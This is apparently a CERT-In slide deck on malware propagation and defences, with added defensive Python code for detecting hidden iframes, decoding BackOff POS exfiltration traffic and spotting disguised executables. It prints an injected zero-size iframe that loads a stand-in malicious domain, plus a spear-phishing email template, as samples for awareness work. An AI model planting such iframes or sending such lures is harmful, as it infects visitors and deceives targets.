Post on 18-Apr-2022


Malware propagation & attacks trends

Aroma Gupta, Bhavya Jain (Bhupendra Singh Awasya, Scientist ‘C’, [GCIH, GREM])

Indian Computer Emergency Response Team (CERT-In)

Ministry of Communications and Information Technology
Department of Information Technology

Government of India

Topics of Discussion

• Introduction:
  – Security Definitions
  – Malware
• Malware Propagation Methods
• Attack Methodology
  – Drive-by-download
  – Watering hole attack
  – Client side/Targeted attacks/RATs
  – DNS Changer Malware
  – Rogue software
  – Web Attack Toolkits
  – Mobile malware threats
• Actions and countermeasures

Security Related Concepts

National level
• Cyber Terrorism
• Attacks on Critical Infrastructure
• Web defacement
• Website intrusion and malware propagation
• Malicious Code
• Scanning and probing
• Denial of Service & Distributed Denial of Service
• Cyber espionage

Organisational level
• Website intrusion/defacement
• Domain stalking
• Malicious Code
• Scanning and probing
• Denial of Service & Distributed Denial of Service
• Targeted attacks
• Phishing
• Data theft
• Insider threats
• Financial frauds

Individual level
• Social Engineering
• Email hacking & misuse
• Identity theft & phishing
• Financial scams
• Abuse through emails
• Abuse through Social Networking sites
• Laptop theft

Cyber threats

Malware ("Mal"icious + Soft"ware")
• Refers to the various kinds of intrusive software that are capable of gaining unauthorized access, thereby leading to data/system compromise.

Malware Propagation

Malware propagation refers to the method by which malware is transmitted to the information system, platform or device it seeks to infect.

Propagation Methods:

More Propagation Tactics

Source: Microsoft

Mobile Malware Evolution

Mobile OS market share

Mobile Malware Threats
• For financial gain/loss: unnecessary calls/SMS/MMS; send & sell private information
• Cause phones to work slowly or crash
• Wipe out contact books or other information on the phone
• Remote control of the phone
• Install false applications

Mobile Threats

Ad Jacking

SMS Trojan

Android Malware Count

Mobile Malware Count

Behaviour Based Platform Based

Drive-by-download

Download of malicious content from the internet without user intervention. It includes:
• The user clicks but is unaware of the consequences, e.g. "Install Flash Plugin".
• The user is unaware of the download, e.g. installation of adware while browsing.

Drive-by-download strategy (diagram: Attacker, Legitimate website, Malicious website, Legitimate user's system; arrows labelled Req., Resp., Connect Attacker)

1.1 Attacker creates a malicious website
1.2 Attacker infects a legitimate website
2 User requests the legitimate website
3 Website response includes the malicious code
4 User's browser requests content from the malicious website
5 Malicious website successfully delivers malware/virus

• hxxp://legitimate.site/css/indexs.php

Reason: an iframe embedded in the legitimate site:
<iframe src=www.maliciousdomain.com width=0 height=0 ></iframe>

Example:
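The hidden-iframe injection shown above is something a site owner can scan their own pages for. The following is an added example (not from the original slides) that parses an HTML page and flags iframes that are zero-sized, CSS-hidden, or point off the hosting domain; the sample page and the host name `legitimate.site` are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a page on the (hypothetical) legitimate site into which
# the zero-size iframe from the slide has been injected.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://legitimate.site/help" width="300" height="200"></iframe>
<iframe src=www.maliciousdomain.com width=0 height=0 ></iframe>
<iframe src="//other.example" style="display:none;visibility:hidden"></iframe>
</body></html>"""

def _is_tiny(value):
    """True when a width/height attribute is 0 or 1 (optionally with 'px')."""
    if value is None:
        return False
    m = re.match(r"^\s*(\d+)\s*(px)?\s*$", value)
    return m is not None and int(m.group(1)) <= 1

def _host_of(src):
    """Hostname of an iframe src. Simplification: a scheme-less value is only
    treated as a host when it starts with 'www.' (as on the slide)."""
    if "//" not in src and src.lower().startswith("www."):
        src = "//" + src
    return (urlparse(src).hostname or "").lower()

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are hidden or load content from another domain."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []          # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        style = (a.get("style") or "").replace(" ", "").lower()
        reasons = []
        if _is_tiny(a.get("width")) or _is_tiny(a.get("height")):
            reasons.append("zero-size")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        host = _host_of(src)
        if host and host != self.page_host and not host.endswith("." + self.page_host):
            reasons.append("external:" + host)
        if reasons:
            self.findings.append((src, reasons))

def find_hidden_iframes(html, page_host):
    """Return [(src, [reasons])] for every suspicious iframe in the page."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    return parser.findings
```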

Quick Response Code (QR Code)

Use your tablet or phone camera to scan this image to visit our website!

• Visit our Website @

!! What if it was set up by an attacker using the Social-Engineer Toolkit (SET) to launch an attack !!

Rogue antivirus "AVG -Antivirus 2011" shortcut icon:

Rogue Software

Social Networking-Spreading rogue antivirus

Cryptolocker - Top Ransomware 2013
• Encrypts files on local drives, shared network drives, USB drives, external hard drives, network file shares and even some cloud storage drives
• Server generates a 2048-bit RSA key pair, and sends the public key back to the infected computer
• Demands a ransom amount in exchange for the decryption key

Recently FireEye has provided a means for decrypting files encrypted by Cryptolocker:
• http://www.fireeye.com/blog/corporate/2014/08/your-locker-of-information-for-cryptolocker-decryption.html
• https://www.DecryptCryptoLocker.com

Note: Keep regular backups of your files

BackOff POS malware:

• Belongs to the family of malware targeting Point of Sale (POS) systems to steal customers' payment card data, i.e. track 1 and track 2 information containing user name, password, CVV number etc.
• Propagation mechanism: scanning and brute-forcing systems running remote desktop applications such as Microsoft Remote Desktop, Apple Remote Desktop, Splashtop 2 etc.
• OS targeted: Microsoft Windows
• Communicates with and executes commands received from the Command and Control server, such as Update, Terminate, Uninstall, Download and Run, Upload KeyLogs etc.
• Sends exfiltrated data to the C2 server.
• Injects a malicious stub into the Windows "Explorer.exe" for persistence, in case the malicious file crashes or is stopped forcefully.
• C2 Communication:

Key logging routine

The password for the RC4 algorithm is the MD5 of a string generated by concatenating the 'id' parameter, the static string 'jhgtsd7fjmytkr', and the 'ui' parameter.

Stolen data is encrypted using the RC4 algorithm and then encoded using Base64.

The ID and UI parameters are used in the RC4 password.
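For an analyst working a captured BackOff C2 session, the key derivation and encoding described above can be reversed to recover what was exfiltrated. The following is an added example (not code from the slides or from any vendor): it derives the RC4 password exactly as stated (MD5 of id + 'jhgtsd7fjmytkr' + ui), then Base64-decodes and RC4-decrypts a blob. The slide does not say whether the MD5 is used as the 32-character hex string or as 16 raw bytes; this example assumes the hex string. The `id`/`ui` values and the sample blob are constructed.

```python
import base64
import hashlib

STATIC_STRING = "jhgtsd7fjmytkr"   # the static string quoted on the slide

def backoff_rc4_password(id_param, ui_param):
    """MD5(id + static string + ui). Assumption: the ASCII hex digest is the
    RC4 key (the slide does not state hex vs. raw bytes)."""
    return hashlib.md5((id_param + STATIC_STRING + ui_param).encode()).hexdigest()

def rc4(key, data):
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def decode_exfil(id_param, ui_param, b64_blob):
    """Reverse the slide's pipeline: Base64-decode, then RC4-decrypt with the
    password derived from the session's id/ui parameters."""
    key = backoff_rc4_password(id_param, ui_param).encode()
    return rc4(key, base64.b64decode(b64_blob))

def _build_sample(id_param, ui_param, plaintext):
    """Forward direction, used here only to construct an offline test blob."""
    key = backoff_rc4_password(id_param, ui_param).encode()
    return base64.b64encode(rc4(key, plaintext)).decode()

# Constructed sample session: hypothetical id/ui values, no real card data.
SAMPLE_ID, SAMPLE_UI = "1234ABCD", "WIN7-POS01"
SAMPLE_PLAINTEXT = b"keylog: constructed sample text"
SAMPLE_BLOB = _build_sample(SAMPLE_ID, SAMPLE_UI, SAMPLE_PLAINTEXT)
```

If the real sample turns out to use the raw 16-byte digest instead, swap `.hexdigest().encode()` for `.digest()` in one place; the rest of the decoder is unchanged.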

Watering Hole Attack

Refers to a technique to target a particular organization by compromising websites that the targets are known to visit. The attack consists of the following phases:
– Identify the target
– Observe the websites the group often uses. Eg.
– Infect one or more of these websites with malware
– Eventually, some member of the targeted group will get infected

Recent vulnerability used in watering hole attacks: IE zero-day vulnerability (CVE-2013-1347)

Working

• One of the most prevalent techniques of targeted attacks

Once the malware/virus is planted on the user's computer, a remote attacker/hacker can:
- Gain access
- Steal credentials
- Use it as a launching pad for further attacks
- Install other malware/viruses
This can lead to complete compromise of the system.

Botnet Trends- INDIA 2013

Targeted Attacks

Refers to the attack technique wherein the attacker targets either an individual or an organization. It includes:
• Profiling of an individual or organization
• Gathering information via social engineering

Purpose: stealing specific information.

Techniques of Targeted attacks
• URL shortening services, for hiding the actual URL, e.g. http://tinyurl.com/ and http://bit.ly/
  e.g. the shortened URL for "www.cert-in.org.in" is "http://bit.ly/1wvvBLU"
• Malicious email attachments (PDF, DOC, XLS, SWF, PPT)
  Most exploited: CVE-2010-3333, CVE-2012-0158, CVE-2009-4324
• Extension hiding techniques

Targeted attacks - example

From: Sr Manager [mailto:employee@abc.com]
Sent: Tuesday, 19 January, 2010 5:14 PM
To: employee@abc.com
bcc: Target1@abc.com, target2@abc.com
Subject: Urgent document for agenda items for the coming meeting

Dear Mr. (Target)

I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected, the password for the attached file is:- "abc123". Please have a look and send your comments and input material to me ASAP.

Regards
ABC

URL Shortening & Extension Hiding Technique

Note: The URL points to an executable which pretends to be a video file (.wmv) but whose actual file extension is .scr

Link in E-mail:

Extension Hiding Technique

Upon unzipping, a .docx (Word document) file is extracted, which is actually an SCR file as shown below:

Note: The dropped file pretends to be a Microsoft Office Word document, but is actually a self-extracting archive with the extension ".scr" (screen saver file)

Extension shown as "docx" - a Word document extension
Self-extracting archive icon - actual extension is ".scr" (screen saver file)
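The two disguises on these slides (a ".wmv" link that is really a .scr, and a ".docx" that is really a self-extracting .scr) can be caught at the mail gateway or on a file share by comparing the claimed extension with the file's first bytes. The following is an added example (not from the original slides) that flags executable extensions behind document or video names, double extensions such as "agenda.docx.scr", and PE headers under a non-executable extension; all file names and byte strings are constructed.

```python
import os

# File signatures a defender compares against the claimed type.
MZ = b"MZ"                         # PE executable (.exe, .scr, .dll, SFX archives)
OLE = b"\xd0\xcf\x11\xe0"          # legacy Office binary (.doc, .xls, .ppt)
ZIP = b"PK\x03\x04"                # OOXML (.docx/.xlsx/.pptx) and plain zips
PDF = b"%PDF"
ASF = b"\x30\x26\xb2\x75"          # ASF/WMV header object GUID

EXPECTED_MAGIC = {".docx": ZIP, ".xlsx": ZIP, ".pptx": ZIP,
                  ".doc": OLE, ".xls": OLE, ".ppt": OLE,
                  ".pdf": PDF, ".wmv": ASF}
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cpl"}

def inspect_name(filename):
    """Name-only checks: an executable extension, and a document/video
    extension directly in front of it (what Windows shows when 'hide known
    extensions' is on, e.g. agenda.docx.scr displays as agenda.docx)."""
    reasons = []
    parts = os.path.basename(filename).lower().split(".")
    exts = ["." + p for p in parts[1:]]
    if exts and exts[-1] in EXEC_EXTS:
        reasons.append("executable-extension:" + exts[-1])
    if len(exts) >= 2 and exts[-2] in EXPECTED_MAGIC:
        reasons.append("double-extension")
    return reasons

def inspect_content(filename, head):
    """Name checks plus a comparison of the claimed extension with the first
    bytes of the file ('head' is the first few bytes, already read)."""
    reasons = inspect_name(filename)
    ext = os.path.splitext(filename.lower())[1]
    if head.startswith(MZ) and ext not in EXEC_EXTS:
        reasons.append("pe-header-under-" + ext)     # the slide's SFX-as-.docx case
    elif ext in EXPECTED_MAGIC and not head.startswith(EXPECTED_MAGIC[ext]):
        reasons.append("magic-mismatch")
    return reasons

# Constructed samples mirroring the slides (no real files involved).
SAMPLES = [
    ("agenda.docx", b"MZ\x90\x00\x03"),            # SFX archive renamed to .docx
    ("meeting_video.wmv.scr", b"MZ\x90\x00"),      # video name, .scr executable
    ("report.docx", b"PK\x03\x04\x14\x00"),        # genuine OOXML document
]
```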

Most targeted OS and Applications 2013

Source: GFI

How an attacker can change the world: Discussion on "DNS Changer Malware" - Operation Ghost Click

• 4 million computers infected
• Routers with default username and password are exploited
• The malware hijacks DNS on the infected system


Attack Toolkits

Attack toolkits are malicious toolkits containing various exploits bundled into a single package.

Working of a Web Attack Toolkit

Attack Toolkit - MPack

Securing against drive-by-download attacks:

• Use of web filtering software
• Enable SmartScreen Filter (available only in Internet Explorer)
• Use web browser plugins:
  – e.g. NoScript, Adblock plugins for Firefox
• Use different and secure web browsers:
  – e.g. Mozilla Firefox with the preinstalled Google Safe Browsing feature

Enable SmartScreen Filter (IE)

This feature blocks fake or malicious sites from distributing questionable downloads or malicious software to the victim's system.

Browser Plug-ins

• NoScript (Firefox plug-in): allows JavaScript, Java and Flash to run only on trusted websites chosen by the user.
  Browser Settings -> Options -> Plugins -> search for "NoScript" -> Install -> restart browser
• Adblock (Firefox plug-in): prevents malicious ads from being executed.
  Browser Settings -> Options -> Plugins -> search for "Adblock" -> Install -> restart browser

Note: many more add-ons and plug-ins are available for IE, Chrome and Firefox.

Configuring Google Chrome

Go to Chrome Settings -> Show advanced settings -> Privacy -> Content Settings
• Disable JavaScript
• Enable phishing and malware protection
• Keep Google Chrome updated

Configure EMET (Enhanced Mitigation Experience Toolkit)

Provides end-node protection against zero-day vulnerabilities and blocks memory-based attack techniques.

Configuring Microsoft Office Word

• Disable ActiveX controls: Office Button -> Word Options -> Trust Center -> Trust Center Settings -> ActiveX Settings
• Disable Macros: Office Button -> Word Options -> Trust Center -> Trust Center Settings -> Macro Settings
• Open Microsoft Office Word documents in Protected View: Office Button -> Word Options -> Trust Center -> Trust Center Settings -> Protected View

Configuring Adobe
• Go to Edit -> Preferences

Actions at organisational level

• Security policies and procedures
• CSIRT/CISO/Administrator/Users
• Multi-layered defense mechanism
  – Network behavior analysis
  – Perimeter defense
  – Security Information and Event Management
  – Database Activity Monitoring
• Updated/patched applications
• Host-based Intrusion Prevention System
• Predefined procedures for information sharing
• Authentication & authorisation to secure information and prevent data leakage
• Authentication of emails (digital signatures)
• Auditing and pentest
• User awareness

Actions at User/Organisation level

• Perform scanning on the computer for possible infection with the removal tools mentioned below.
• Conduct routine backups of important files, keeping the backups stored offline.
• Disconnect the infected system from wireless or wired networks to prevent the malware from further encrypting files stored on network shares.
• Exercise caution while visiting links within emails received from untrusted users or unexpectedly received from trusted users.
• Do not download and open attachments in emails received from untrusted users or unexpectedly received from trusted users.
• Exercise caution while visiting links to web pages.
• Protect yourself against social engineering attacks.
• Do not visit untrusted websites.
• Enable the firewall at desktop and gateway level and disable ports that are not required.
• Avoid downloading pirated software.
• Keep up-to-date patches and fixes on the operating system and application software.
• Keep up-to-date antivirus and antispyware signatures at desktop and gateway level.

Thank you

Incident Response Helpdesk

Phone: 1800 11 4949

FAX: 1800 11 6969

e-mail: incident@cert-in.org.in

http://www.cert-in.org.in
